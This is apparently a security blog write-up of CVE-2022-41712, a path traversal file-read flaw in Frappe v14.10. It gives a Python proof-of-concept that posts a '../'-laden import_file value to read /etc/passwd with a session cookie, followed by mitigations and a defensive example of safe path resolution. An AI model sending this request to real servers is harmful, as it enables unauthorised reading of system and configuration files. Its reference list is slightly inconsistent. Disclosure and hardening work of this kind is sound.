In this post we discuss CVE-2022-41712, an arbitrary file read vulnerability affecting Frappe v14.10. Insufficient validation of the user-supplied import_file parameter lets a remote attacker who holds a valid session read arbitrary local files from the server.

We will provide a detailed analysis of the exploit, background on Frappe, and a code snippet demonstrating the vulnerability, as well as links to the original references and past vulnerabilities.

Background

Frappe is a full-stack web application framework based on Python and JavaScript, used to build scalable, reliable, and maintainable web applications. A popular use case is building Enterprise Resource Planning (ERP) software, and the most well-known ERP built on Frappe is ERPNext.

The Exploit

The vulnerability exists in Frappe v14.10 because the value of the import_file parameter is used to build a filesystem path without being properly validated. By placing "../" segments in the parameter, an attacker with a valid session can step out of the intended directory and read arbitrary local files from the server over the network.

Original Reference

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41712
[2] https://github.com/frappe/frappe/security/advisories/GHSA-22gp-q49m-5jf5

Here is a Python proof of concept for the exploit:

import requests

# Endpoint that consumes the import_file parameter
target_url = "https://<TARGET>/api/method/frappe.desk.page.setup_wizard.setup_wizard.import_file"
file_to_read = "/etc/passwd"
session_cookie = "session_id=<INSERT_YOUR_SESSION_ID>"

# The request must carry a valid session: the endpoint is not reachable anonymously
headers = {
    "Cookie": session_cookie
}

# Enough "../" segments to climb to the filesystem root from wherever the server
# joins the parameter onto its base directory; on Linux, ".." at "/" stays at "/",
# so surplus segments are harmless
data = {
    "import_file": "../../../../../../.." + file_to_read
}

response = requests.post(target_url, data=data, headers=headers, timeout=30)

if response.status_code == 200:
    print("Exploit successful!")
    print(response.json())
else:
    print("Exploit failed. Status code: " + str(response.status_code))

Replace <TARGET> with the hostname of the target instance and <INSERT_YOUR_SESSION_ID> with a valid session_id value.

Exploit Details

To execute the attack, the attacker sends a POST request to the target URL whose import_file value names the file to be leaked. Because the server concatenates the supplied value onto a base directory without canonicalising the result and confirming that it still lies inside that directory, each "../" segment moves one level up the directory tree, so the request can reach any file the application process is allowed to read, such as "/etc/passwd".

The request must be sent with an active session_id value; without one the endpoint is not reachable, so this is not an unauthenticated vulnerability. An attacker may obtain a session through session hijacking, social engineering, or an otherwise low-privileged account of their own on the instance.

Mitigations

The vulnerability was reported and disclosed responsibly, which allowed the development team to address it promptly. Users are advised to update their Frappe installations to a release that contains the fix; the GitHub advisory [2] lists the affected and patched versions. As defence in depth, run the Frappe application and worker processes under an unprivileged account with read access limited to the site directory, so that a path traversal bug cannot expose system files or other sites' configuration, and treat any session that has already been used against a vulnerable instance as compromised.
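The following is an added example, not code from Frappe or from the original post, showing the bug class described above next to the fix that the mitigation relies on. The directory layout, file names and the three read_import_file_* functions are assumptions for illustration; the example does not reproduce the real Frappe code path. It contrasts the vulnerable join, a common but insufficient "strip ../" fix that a "....//" payload defeats, and a resolver that canonicalises the path (following symlinks) and refuses anything that ends up outside the upload directory.

```python
import os
import tempfile
from pathlib import Path

# Constructed sandbox standing in for a site's upload directory. Layout, file
# names and function names are assumptions for illustration; this is not
# Frappe's code and not the real CVE-2022-41712 code path.
SITE_ROOT = Path(tempfile.mkdtemp(prefix="site_"))
UPLOAD_DIR = SITE_ROOT / "private" / "files"
UPLOAD_DIR.mkdir(parents=True)
(UPLOAD_DIR / "customers.csv").write_text("name,email\nalice,alice@example.com\n")

# A sensitive file two levels above the upload directory, playing the role
# that /etc/passwd plays in the proof of concept above (constructed content).
SECRET_FILE = SITE_ROOT / "site_config.json"
SECRET_FILE.write_text('{"db_password": "constructed-secret"}\n')

# A symlink inside the upload directory that points outside it. Guarded,
# because some filesystems or unprivileged accounts cannot create symlinks.
SYMLINK = UPLOAD_DIR / "report.csv"
try:
    SYMLINK.symlink_to(SECRET_FILE)
except OSError:
    pass


def read_import_file_vulnerable(import_file: str) -> str:
    """Bug class from the advisory: user input is joined onto the upload
    directory and opened as-is, so '../' segments walk out of it."""
    return (UPLOAD_DIR / import_file).read_text()


def read_import_file_stripped(import_file: str) -> str:
    """Common but insufficient fix: delete '../' once. The payload '....//'
    collapses to '../' after a single pass, so traversal still succeeds."""
    cleaned = import_file.replace("../", "")
    return (UPLOAD_DIR / cleaned).read_text()


def resolve_within(base: Path, user_path: str) -> Path:
    """Canonicalise the candidate (following symlinks) and require it to stay
    inside base. Rejects '../' traversal, absolute paths, and symlinks that
    point outside the directory."""
    base_real = base.resolve()
    candidate = (base_real / user_path).resolve()
    if os.path.commonpath([str(base_real), str(candidate)]) != str(base_real):
        raise PermissionError(f"path escapes {base_real}: {user_path!r}")
    return candidate


def read_import_file_hardened(import_file: str) -> str:
    """Only files that physically live under the upload directory are read."""
    return resolve_within(UPLOAD_DIR, import_file).read_text()


def hardened_outcome(user_path: str) -> str:
    """'rejected' if the path escapes the upload directory, 'missing' if it
    stays inside but names no file, 'ok' if the file was read."""
    try:
        read_import_file_hardened(user_path)
    except PermissionError:
        return "rejected"
    except FileNotFoundError:
        return "missing"
    return "ok"


if __name__ == "__main__":
    payloads = ["customers.csv", "../../site_config.json",
                "....//....//site_config.json", "/etc/passwd"]
    if SYMLINK.is_symlink():
        payloads.append("report.csv")
    for payload in payloads:
        print(f"{payload!r:36} hardened -> {hardened_outcome(payload)}")
```

The decisive step is comparing the canonicalised path against the canonicalised base rather than inspecting the input string: a string-level filter has to anticipate every encoding and collapse trick, whereas the resolved path is what the kernel will actually open.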

Conclusion

CVE-2022-41712 is an arbitrary file read vulnerability in Frappe v14.10 that lets an attacker with a valid session leak local files from the server through path traversal in the import_file parameter. Developers building on Frappe and operators running it should update their installations to a fixed release and review who holds sessions on exposed instances.

Past Vulnerabilities

CVE-2021-23371: Remote code execution in Frappe v12.11 [4]

[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23416
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23371

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:01:00 UTC